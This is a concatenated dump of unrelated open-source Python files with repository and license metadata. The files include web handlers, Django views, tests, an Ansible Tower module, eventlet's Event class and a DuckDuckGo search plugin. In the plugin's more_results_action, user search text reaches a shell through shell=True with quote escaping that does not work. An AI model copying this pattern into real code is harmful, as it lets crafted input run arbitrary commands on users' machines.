rebasehelper/helpers/input_helper.py
|
Python
|
gpl-2.0
| 3,222
| 0.000622
|
#!/usr/bin/env python
#coding=utf8
import datetime
import logging
from handler import UserBaseHandler
from lib.route import route
from lib.util import vmobile
@route(r'/user', name='user') #用户后台首页
class UserHandler(UserBaseHandler):
def get(self):
user = self.get_current_user()
try:
self.session['user'] = user
self.session.save()
except:
pass
self.render('user/index.html')
@route(r'/user/profile', name='user_profile') #用户资料
class ProfileHandler(UserBaseHandler):
def get(self):
self.render('user/profile.html')
def post(self):
self.redirect('/user/profile')
|
ptphp/PtPy
|
pttornado/src/handler/user.py
|
Python
|
bsd-3-clause
| 712
| 0.018786
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetGlossary
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-translate
# [START translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from google.cloud import translate_v3beta1
def sample_get_glossary():
# Create a client
client = translate_v3beta1.TranslationServiceClient()
# Initialize request argument(s)
request = translate_v3beta1.GetGlossaryRequest(
name="name_value",
)
# Make the request
response = client.get_glossary(request=request)
# Handle the response
print(response)
# [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
|
googleapis/python-translate
|
samples/generated_samples/translate_v3beta1_generated_translation_service_get_glossary_sync.py
|
Python
|
apache-2.0
| 1,480
| 0.000676
|
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase
class EncodeTests(TwillTestCase):
def test_00_first(self): # will run first due to its name
"""3B_GetEncodeData: Clearing history"""
self.clear_history()
def test_10_Encode_Data(self):
"""3B_GetEncodeData: Getting encode data"""
self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
# hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
self.wait()
self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
# self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
# self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
# self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
# self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
# self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
|
jmchilton/galaxy-central
|
galaxy/test/functional/test_3B_GetEncodeData.py
|
Python
|
mit
| 1,185
| 0.01097
|
from django.conf.urls import url
from django.contrib.auth.views import login, \
logout, \
logout_then_login, \
password_change, \
password_change_done, \
password_reset, \
password_reset_done, \
password_reset_confirm, \
password_reset_complete
from . import views
urlpatterns = [
url(r'^$', views.dashboard, name='dashboard'),
# login / logout urls
url(r'^login/$', view=login, name='login'),
url(r'^logout/$', view=logout, name='logout'),
url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'),
# change password urls
url(r'^password-change/$', view=password_change, name='password_change'),
url(r'^password-change/done/$', view=password_change_done, name='password_change_done'),
# restore password urls
url(r'^password-reset/$', view=password_reset, name='password_reset'),
url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'),
url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'),
url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'),
]
|
t104801/webapp
|
security/urls.py
|
Python
|
gpl-3.0
| 1,479
| 0.004057
|
from lacuna.building import MyBuilding
class fission(MyBuilding):
path = 'fission'
def __init__( self, client, body_id:int = 0, building_id:int = 0 ):
super().__init__( client, body_id, building_id )
|
tmtowtdi/MontyLacuna
|
lib/lacuna/buildings/boring/fission.py
|
Python
|
mit
| 219
| 0.031963
|
import unittest
from nose.tools import assert_equals
from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable
from robotide.controller.filecontrollers import TestCaseFileController
from robotide.controller.tablecontrollers import ImportSettingsController
VALID_NAME = 'Valid name'
class TestCaseNameValidationTest(unittest.TestCase):
def setUp(self):
self.ctrl = TestCaseFileController(TestCaseFile()).tests
def test_valid_name(self):
self._validate_name(VALID_NAME, True)
def test_empty_name(self):
self._validate_name('', False)
def test_name_with_only_whitespace(self):
self._validate_name(' ', False)
def test_duplicate_name(self):
self.ctrl.new(VALID_NAME)
self._validate_name(VALID_NAME, False)
self._validate_name(VALID_NAME.upper(), False)
self._validate_name(VALID_NAME.replace(' ', '_'), False)
def test_duplicate_name_when_previous_name_known(self):
ctrl = self.ctrl.new(VALID_NAME)
self._validate_name(VALID_NAME, True, ctrl)
self._validate_name(VALID_NAME.upper(), True, ctrl)
self._validate_name(VALID_NAME.replace(' ', '_'), True, ctrl)
def _validate_name(self, name, expected_valid, named_ctrl=None):
valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message)
assert_equals(valid, expected_valid)
class TestCaseCreationTest(unittest.TestCase):
def setUp(self):
self.ctrl = TestCaseFileController(TestCaseFile()).tests
def test_whitespace_is_stripped(self):
test = self.ctrl.new(' ' + VALID_NAME + '\t \n')
assert_equals(test.name, VALID_NAME)
class LibraryImportListOperationsTest(unittest.TestCase):
def setUp(self):
self._parent = lambda:0
self._parent.mark_dirty = lambda:0
self._parent.datafile_controller = self._parent
self._parent.update_namespace = lambda:0
self._table = TestCaseFileSettingTable(lambda:0)
self.ctrl = ImportSettingsController(self._parent, self._table)
self._lib1 = self.ctrl.add_library('libbi1', '', '')
self._lib2 = self.ctrl.add_library('libbi2', '', '')
self.assertEqual([self._lib1.name, self._lib2.name], [l.name for l in self.ctrl])
def test_move_up(self):
self.ctrl.move_up(1)
self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
def test_move_down(self):
self.ctrl.move_down(0)
self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
|
fingeronthebutton/RIDE
|
utest/controller/test_tablecontrollers.py
|
Python
|
apache-2.0
| 2,586
| 0.004254
|
#!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_job_launch
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: Launch an Ansible Job.
description:
- Launch an Ansible Tower jobs. See
U(https://www.ansible.com/tower) for an overview.
options:
job_template:
description:
- Name of the job_template to use.
required: True
job_explanation:
description:
- Job explanation field.
default: null
job_type:
description:
- Job_type to use for the job, only used if prompt for job_type is set.
choices: ["run", "check", "scan"]
default: null
inventory:
description:
- Inventory to use for the job, only used if prompt for inventory is set.
default: null
credential:
description:
- Credential to use for job, only used if prompt for credential is set.
default: null
extra_vars:
description:
- Extra_vars to use for the job_template. Use '@' for a file.
default: null
limit:
description:
- Limit to use for the job_template.
default: null
tags:
description:
- Specific tags to use for from playbook.
default: null
use_job_endpoint:
description:
- Disable launching jobs from job template.
default: False
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Launch a job
tower_job_launch:
job_template: "My Job Template"
register: job
- name: Wait for job max 120s
tower_job_wait:
job_id: job.id
timeout: 120
'''
RETURN = '''
id:
description: job id of the newly launched job
returned: success
type: int
sample: 86
status:
description: status of newly launched job
returned: success
type: string
sample: pending
'''
from ansible.module_utils.basic import AnsibleModule
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
from ansible.module_utils.ansible_tower import (
tower_auth_config,
tower_check_mode,
tower_argument_spec,
)
HAS_TOWER_CLI = True
except ImportError:
HAS_TOWER_CLI = False
def main():
argument_spec = tower_argument_spec()
argument_spec.update(dict(
job_template=dict(required=True),
job_type=dict(choices=['run', 'check', 'scan']),
inventory=dict(),
credential=dict(),
limit=dict(),
tags=dict(type='list'),
extra_vars=dict(type='list'),
))
module = AnsibleModule(
argument_spec,
supports_check_mode=True
)
if not HAS_TOWER_CLI:
module.fail_json(msg='ansible-tower-cli required for this module')
json_output = {}
tags = module.params.get('tags')
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
try:
params = module.params.copy()
if isinstance(tags, list):
params['tags'] = ','.join(tags)
job = tower_cli.get_resource('job')
lookup_fields = ('job_template', 'inventory', 'credential')
for field in lookup_fields:
try:
name = params.pop(field)
result = tower_cli.get_resource(field).get(name=name)
params[field] = result['id']
except exc.NotFound as excinfo:
module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False)
result = job.launch(no_input=True, **params)
json_output['id'] = result['id']
json_output['status'] = result['status']
except (exc.ConnectionError, exc.BadRequest) as excinfo:
module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main()
|
HuaweiSwitch/ansible
|
lib/ansible/modules/web_infrastructure/ansible_tower/tower_job_launch.py
|
Python
|
gpl-3.0
| 4,901
| 0.000816
|
# coding: utf-8
from django.views.generic import CreateView, UpdateView, DeleteView
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
from django.template import RequestContext
from django.core.serializers.json import DjangoJSONEncoder
from django.conf import settings
try:
import json
except ImportError:
from django.utils import simplejson as json
class JSONResponseMixin(object):
"""
This is a slightly modified version from django-braces project
(https://github.com/brack3t/django-braces)
"""
content_type = None
json_dumps_kwargs = None
def get_content_type(self):
return self.content_type or u"application/json"
def get_json_dumps_kwargs(self):
if self.json_dumps_kwargs is None:
self.json_dumps_kwargs = {}
self.json_dumps_kwargs.setdefault(u'ensure_ascii', False)
return self.json_dumps_kwargs
def render_json_response(self, context_dict, status=200):
"""
Limited serialization for shipping plain data. Do not use for models
or other complex or custom objects.
"""
json_context = json.dumps(
context_dict,
cls=DjangoJSONEncoder,
**self.get_json_dumps_kwargs()
).encode(u'utf-8')
return HttpResponse(
json_context,
content_type=self.get_content_type(),
status=status
)
class AjaxFormMixin(JSONResponseMixin):
message_template = None
def pre_save(self):
pass
def post_save(self):
pass
def form_valid(self, form):
"""
If the request is ajax, save the form and return a json response.
Otherwise return super as expected.
"""
self.object = form.save(commit=False)
self.pre_save()
self.object.save()
if hasattr(form, 'save_m2m'):
form.save_m2m()
self.post_save()
if self.request.is_ajax():
return self.render_json_response(self.get_success_result())
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
"""
We have errors in the form. If ajax, return them as json.
Otherwise, proceed as normal.
"""
if self.request.is_ajax():
return self.render_json_response(self.get_error_result(form))
return super(AjaxFormMixin, self).form_invalid(form)
def get_message_template_context(self):
return {
'instance': self.object,
'object': self.object
}
def get_message_template_html(self):
return render_to_string(
self.message_template,
self.get_message_template_context(),
context_instance=RequestContext(self.request)
)
def get_response_message(self):
message = ''
if self.message_template:
message = self.get_message_template_html()
return message
def get_success_result(self):
return {'status': 'ok', 'message': self.get_response_message()}
def get_error_result(self, form):
html = render_to_string(
self.template_name,
self.get_context_data(form=form),
context_instance=RequestContext(self.request)
)
return {'status': 'error', 'message': html}
DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html")
class AjaxCreateView(AjaxFormMixin, CreateView):
template_name = DEFAULT_FORM_TEMPLATE
class AjaxUpdateView(AjaxFormMixin, UpdateView):
template_name = DEFAULT_FORM_TEMPLATE
class AjaxDeleteView(JSONResponseMixin, DeleteView):
def pre_delete(self):
pass
def post_delete(self):
pass
def get_success_result(self):
return {'status': 'ok'}
def delete(self, request, *args, **kwargs):
"""
The same logic as in DeleteView but some hooks and
JSON response in case of AJAX request
"""
self.object = self.get_object()
self.pre_delete()
self.object.delete()
self.post_delete()
if self.request.is_ajax():
return self.render_json_response(self.get_success_result())
success_url = self.get_success_url()
return HttpResponseRedirect(success_url)
|
kobox/achilles.pl
|
src/static/fm/views.py
|
Python
|
mit
| 4,377
| 0.000457
|
from django.apps import AppConfig
class IndexConfig(AppConfig):
name = 'web.index'
|
LoRexxar/Cobra-W
|
web/index/apps.py
|
Python
|
mit
| 89
| 0
|
import pandas as pd
from requests import get
from StringIO import StringIO
from pandas.io.common import ZipFile
def get_movielens_data(local_file=None, get_genres=False):
'''Downloads movielens data and stores it in pandas dataframe.
'''
if not local_file:
#print 'Downloading data...'
zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip'
zip_response = get(zip_file_url)
zip_contents = StringIO(zip_response.content)
#print 'Done.'
else:
zip_contents = local_file
#print 'Loading data into memory...'
with ZipFile(zip_contents) as zfile:
zip_files = pd.Series(zfile.namelist())
zip_file = zip_files[zip_files.str.contains('ratings')].iat[0]
zdata = zfile.read(zip_file)
if 'latest' in zip_file:
header = 0
else:
header = None
delimiter = ','
zdata = zdata.replace('::', delimiter) # makes data compatible with pandas c-engine
ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c',
names=['userid', 'movieid', 'rating', 'timestamp'],
usecols=['userid', 'movieid', 'rating'])
if get_genres:
zip_file = zip_files[zip_files.str.contains('movies')].iat[0]
with zfile.open(zip_file) as zdata:
if 'latest' in zip_file:
delimiter = ','
else:
delimiter = '::'
genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python',
names=['movieid', 'movienm', 'genres'])
ml_genres = split_genres(genres_data)
ml_data = (ml_data, ml_genres)
return ml_data
def split_genres(genres_data):
genres_data.index.name = 'movie_idx'
genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid')
ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True)
return ml_genres
def filter_short_head(data, threshold=0.01):
short_head = data.groupby('movieid', sort=False)['userid'].nunique()
short_head.sort_values(ascending=False, inplace=True)
ratings_perc = short_head.cumsum()*1.0/short_head.sum()
movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head)
long_tail_movies = ratings_perc[movies_perc > threshold].index
return long_tail_movies
|
Evfro/fifty-shades
|
polara/tools/movielens.py
|
Python
|
mit
| 2,538
| 0.006304
|
"""
Copyright (c) 2015 Michael Bright and Bamboo HR LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flask import Response
from rapid.lib.version import Version
from rapid.lib import api_key_required
from rapid.lib.utils import UpgradeUtil
class UpgradeController(object):
def __init__(self, flask_app):
self.flask_app = flask_app
def configure_routing(self):
self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST'])
def upgrade_master(self, version):
worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config)
return Response("It worked!" if worked else "It didn't work, version {} restored!".format(Version.get_version()), status=200 if worked else 505)
|
BambooHR/rapid
|
rapid/master/controllers/api/upgrade_controller.py
|
Python
|
apache-2.0
| 1,295
| 0.002317
|
#!/usr/local/bin/python3
import cgi
print("Content-type: text/html")
print('''
<!DOCTYPE html>
<html>
<head>
<title>Python</title>
</head>
<body>
<h1>Python</h1>
<p>Python</p>
<p>This is the article for Python</p>
</body>
</html>
''')
|
Secretmapper/updevcamp-session-2-dist
|
form/cgi-bin/lectures/simple/python.py
|
Python
|
mit
| 272
| 0
|
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
from unittest import mock
from oslotest import base as test_base
from oslo_service import systemd
class SystemdTestCase(test_base.BaseTestCase):
"""Test case for Systemd service readiness."""
def test__abstractify(self):
sock_name = '@fake_socket'
res = systemd._abstractify(sock_name)
self.assertEqual('\0{0}'.format(sock_name[1:]), res)
@mock.patch.object(os, 'getenv', return_value='@fake_socket')
def _test__sd_notify(self, getenv_mock, unset_env=False):
self.ready = False
self.closed = False
class FakeSocket(object):
def __init__(self, family, type):
pass
def connect(fs, socket):
pass
def close(fs):
self.closed = True
def sendall(fs, data):
if data == b'READY=1':
self.ready = True
with mock.patch.object(socket, 'socket', new=FakeSocket):
if unset_env:
systemd.notify_once()
else:
systemd.notify()
self.assertTrue(self.ready)
self.assertTrue(self.closed)
def test_notify(self):
self._test__sd_notify()
def test_notify_once(self):
os.environ['NOTIFY_SOCKET'] = '@fake_socket'
self._test__sd_notify(unset_env=True)
self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET')
@mock.patch("socket.socket")
def test_onready(self, sock_mock):
recv_results = [b'READY=1', '', socket.timeout]
expected_results = [0, 1, 2]
for recv, expected in zip(recv_results, expected_results):
if recv == socket.timeout:
sock_mock.return_value.recv.side_effect = recv
else:
sock_mock.return_value.recv.return_value = recv
actual = systemd.onready('@fake_socket', 1)
self.assertEqual(expected, actual)
|
openstack/oslo.service
|
oslo_service/tests/test_systemd.py
|
Python
|
apache-2.0
| 2,580
| 0
|
from __future__ import print_function
from eventlet import hubs
from eventlet.support import greenlets as greenlet
__all__ = ['Event']
class NOT_USED:
def __repr__(self):
return 'NOT_USED'
NOT_USED = NOT_USED()
class Event(object):
"""An abstraction where an arbitrary number of coroutines
can wait for one event from another.
Events are similar to a Queue that can only hold one item, but differ
in two important ways:
1. calling :meth:`send` never unschedules the current greenthread
2. :meth:`send` can only be called once; create a new event to send again.
They are good for communicating results between coroutines, and
are the basis for how
:meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>`
is implemented.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def baz(b):
... evt.send(b + 1)
...
>>> _ = eventlet.spawn_n(baz, 3)
>>> evt.wait()
4
"""
_result = None
_exc = None
def __init__(self):
self._waiters = set()
self.reset()
def __str__(self):
params = (self.__class__.__name__, hex(id(self)),
self._result, self._exc, len(self._waiters))
return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params
def reset(self):
# this is kind of a misfeature and doesn't work perfectly well,
# it's better to create a new event rather than reset an old one
# removing documentation so that we don't get new use cases for it
assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.'
self._result = NOT_USED
self._exc = None
def ready(self):
""" Return true if the :meth:`wait` call will return immediately.
Used to avoid waiting for things that might take a while to time out.
For example, you can put a bunch of events into a list, and then visit
them all repeatedly, calling :meth:`ready` until one returns ``True``,
and then you can :meth:`wait` on that one."""
return self._result is not NOT_USED
def has_exception(self):
return self._exc is not None
def has_result(self):
return self._result is not NOT_USED and self._exc is None
def poll(self, notready=None):
if self.ready():
return self.wait()
return notready
# QQQ make it return tuple (type, value, tb) instead of raising
# because
# 1) "poll" does not imply raising
# 2) it's better not to screw up caller's sys.exc_info() by default
# (e.g. if caller wants to calls the function in except or finally)
def poll_exception(self, notready=None):
if self.has_exception():
return self.wait()
return notready
def poll_result(self, notready=None):
if self.has_result():
return self.wait()
return notready
def wait(self):
"""Wait until another coroutine calls :meth:`send`.
Returns the value the other coroutine passed to
:meth:`send`.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def wait_on():
... retval = evt.wait()
... print("waited for {0}".format(retval))
>>> _ = eventlet.spawn(wait_on)
>>> evt.send('result')
>>> eventlet.sleep(0)
waited for result
Returns immediately if the event has already
occured.
>>> evt.wait()
'result'
"""
current = greenlet.getcurrent()
if self._result is NOT_USED:
self._waiters.add(current)
try:
return hubs.get_hub().switch()
finally:
self._waiters.discard(current)
if self._exc is not None:
current.throw(*self._exc)
return self._result
def send(self, result=None, exc=None):
"""Makes arrangements for the waiters to be woken with the
result and then returns immediately to the parent.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def waiter():
... print('about to wait')
... result = evt.wait()
... print('waited for {0}'.format(result))
>>> _ = eventlet.spawn(waiter)
>>> eventlet.sleep(0)
about to wait
>>> evt.send('a')
>>> eventlet.sleep(0)
waited for a
It is an error to call :meth:`send` multiple times on the same event.
>>> evt.send('whoops')
Traceback (most recent call last):
...
AssertionError: Trying to re-send() an already-triggered event.
Use :meth:`reset` between :meth:`send` s to reuse an event object.
"""
assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.'
self._result = result
if exc is not None and not isinstance(exc, tuple):
exc = (exc, )
self._exc = exc
hub = hubs.get_hub()
for waiter in self._waiters:
hub.schedule_call_global(
0, self._do_send, self._result, self._exc, waiter)
def _do_send(self, result, exc, waiter):
if waiter in self._waiters:
if exc is None:
waiter.switch(result)
else:
waiter.throw(*exc)
def send_exception(self, *args):
"""Same as :meth:`send`, but sends an exception to waiters.
The arguments to send_exception are the same as the arguments
to ``raise``. If a single exception object is passed in, it
will be re-raised when :meth:`wait` is called, generating a
new stacktrace.
>>> from eventlet import event
>>> evt = event.Event()
>>> evt.send_exception(RuntimeError())
>>> evt.wait()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "eventlet/event.py", line 120, in wait
current.throw(*self._exc)
RuntimeError
If it's important to preserve the entire original stack trace,
you must pass in the entire :func:`sys.exc_info` tuple.
>>> import sys
>>> evt = event.Event()
>>> try:
... raise RuntimeError()
... except RuntimeError:
... evt.send_exception(*sys.exc_info())
...
>>> evt.wait()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "eventlet/event.py", line 120, in wait
current.throw(*self._exc)
File "<stdin>", line 2, in <module>
RuntimeError
Note that doing so stores a traceback object directly on the
Event object, which may cause reference cycles. See the
:func:`sys.exc_info` documentation.
"""
# the arguments and the same as for greenlet.throw
return self.send(None, args)
|
sbadia/pkg-python-eventlet
|
eventlet/event.py
|
Python
|
mit
| 7,095
| 0.000423
|
from canvas.exceptions import ServiceError, ValidationError
from canvas.economy import InvalidPurchase
from drawquest import knobs
from drawquest.apps.palettes.models import get_palette_by_name, all_palettes
from drawquest.signals import balance_changed
def balance(user):
return int(user.kv.stickers.currency.get() or 0)
def _adjust_balance(user, amount):
if amount >= 0:
user.kv.stickers.currency.increment(amount)
else:
result = user.kv.stickers.currency.increment_ifsufficient(amount)
if not result['success']:
raise InvalidPurchase("Insufficient balance.")
balance_changed.send(None, user=user)
publish_balance(user)
def publish_balance(user):
user.redis.coin_channel.publish({'balance': balance(user)})
def credit(user, amount):
_adjust_balance(user, amount)
def debit(user, amount):
_adjust_balance(user, -amount)
def credit_first_quest(user):
credit(user, knobs.REWARDS['first_quest'])
def credit_quest_of_the_day_completion(user):
credit(user, knobs.REWARDS['quest_of_the_day'])
def credit_archived_quest_completion(user):
credit(user, knobs.REWARDS['archived_quest'])
def credit_personal_share(user):
credit(user, knobs.REWARDS['personal_share'])
def credit_streak(user, streak):
credit(user, knobs.REWARDS['streak_{}'.format(streak)])
def credit_star(user):
user.kv.stickers_received.increment(1)
credit(user, knobs.REWARDS['star'])
def purchase_palette(user, palette):
if isinstance(palette, basestring):
palette = get_palette_by_name(palette_name)
if palette in user.redis.palettes:
raise InvalidPurchase("You've already bought this palette.")
debit(user, palette.cost)
user.redis.palettes.unlock(palette)
|
canvasnetworks/canvas
|
website/drawquest/economy.py
|
Python
|
bsd-3-clause
| 1,765
| 0.007365
|
#
# Copyright (C) 2010 Cardapio Team (tvst@hotmail.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
## Duck Duck Go search plugin by Clifton Mulkey
## Adapted from the Google Search plugin
class CardapioPlugin(CardapioPluginInterface):
author = _('Cardapio Team')
name = _('DuckDuckGo')
description = _('Perform quick DuckDuckGo searches')
url = ''
help_text = ''
version = '1.0'
plugin_api_version = 1.40
search_delay_type = 'remote'
default_keyword = 'duck'
category_name = _('DuckDuckGo Results')
category_icon = 'system-search'
icon = 'system-search'
category_tooltip = _('Results found with DuckDuckGo')
hide_from_sidebar = True
def __init__(self, cardapio_proxy, category):
self.c = cardapio_proxy
try:
from gio import File, Cancellable
from urllib2 import quote
from simplejson import loads
from locale import getdefaultlocale
from glib import GError
except Exception, exception:
self.c.write_to_log(self, 'Could not import certain modules', is_error=True)
self.c.write_to_log(self, exception, is_error=True)
self.loaded = False
return
self.File = File
self.Cancellable = Cancellable
self.quote = quote
self.loads = loads
self.getdefaultlocale = getdefaultlocale
self.GError = GError
self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json'
self.search_controller = self.Cancellable()
self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'"
self.action = {
'name': _('Show additional results'),
'tooltip': _('Show additional search results in your web browser'),
'icon name': 'system-search',
'type': 'callback',
'command': self.more_results_action,
'context menu': None,
}
self.loaded = True
def search(self, text, result_limit):
# TODO: I'm sure this is not the best way of doing remote procedure
# calls, but I can't seem to find anything that is this easy to use and
# compatible with gtk. Argh :(
# TODO: we should really check if there's an internet connection before
# proceeding...
self.current_query = text
text = self.quote(str(text))
# Is there a way to get the result_limit in the init method
# so we don't have to assign it everytime search is called?
self.result_limit = result_limit
query = self.query_url.format(text)
self.stream = self.File(query)
self.search_controller.reset()
self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller)
def cancel(self):
if not self.search_controller.is_cancelled():
self.search_controller.cancel()
def handle_search_result(self, gdaemonfile=None, response=None):
# This function parses the results from the query
# The results returned from DDG are a little convoluted
# so we have to check for many different types of results here
result_count = 0;
try:
response = self.stream.load_contents_finish(response)[0]
except self.GError, e:
# no need to worry if there's no response: maybe there's no internet
# connection...
self.c.handle_search_error(self, 'no response')
return
raw_results = self.loads(response)
# print raw_results
parsed_results = []
if 'Error' in raw_results:
self.c.handle_search_error(self, raw_results['Error'])
return
# check for an abstract section
try:
if raw_results['Abstract']:
item = {
'name': raw_results['Heading'],
'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']),
'icon name': 'text-html',
'type': 'xdg',
'command': raw_results['AbstractURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for a definition section
try:
if raw_results['Definition']:
item = {
'name': '%s (Definition)' % raw_results['Heading'],
'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']),
'icon name': 'text-html',
'type': 'xdg',
'command': raw_results['DefinitionURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for a related topics section
try:
if raw_results['RelatedTopics']:
for raw_result in raw_results['RelatedTopics']:
if result_count >= self.result_limit: break
#some related topics have a 'Topics' sub list
try:
for result in raw_result['Topics']:
if result_count >= self.result_limit: break
item = {
'name': result['Text'],
'tooltip': result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
#otherwise the RelatedTopic is a single entry
item = {
'name': raw_result['Text'],
'tooltip': raw_result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': raw_result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
# check for external results section
try:
if raw_results['Results']:
for raw_result in raw_results['Results']:
if result_count >= self.result_limit: break
item = {
'name': raw_result['Text'],
'tooltip': raw_result['FirstURL'],
'icon name': 'text-html',
'type': 'xdg',
'command': raw_result['FirstURL'],
'context menu': None,
}
parsed_results.append(item)
result_count += 1
except KeyError:
pass
if parsed_results:
parsed_results.append(self.action)
self.c.handle_search_result(self, parsed_results, self.current_query)
def more_results_action(self, text):
text = text.replace("'", r"\'")
text = text.replace('"', r'\"')
try:
subprocess.Popen(self.action_command % text, shell=True)
except OSError, e:
self.c.write_to_log(self, 'Error launching plugin action.', is_error=True)
self.c.write_to_log(self, e, is_error=True)
|
daboross/cardapio
|
src/plugins/duckduck.py
|
Python
|
gpl-3.0
| 8,409
| 0.002259
|
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
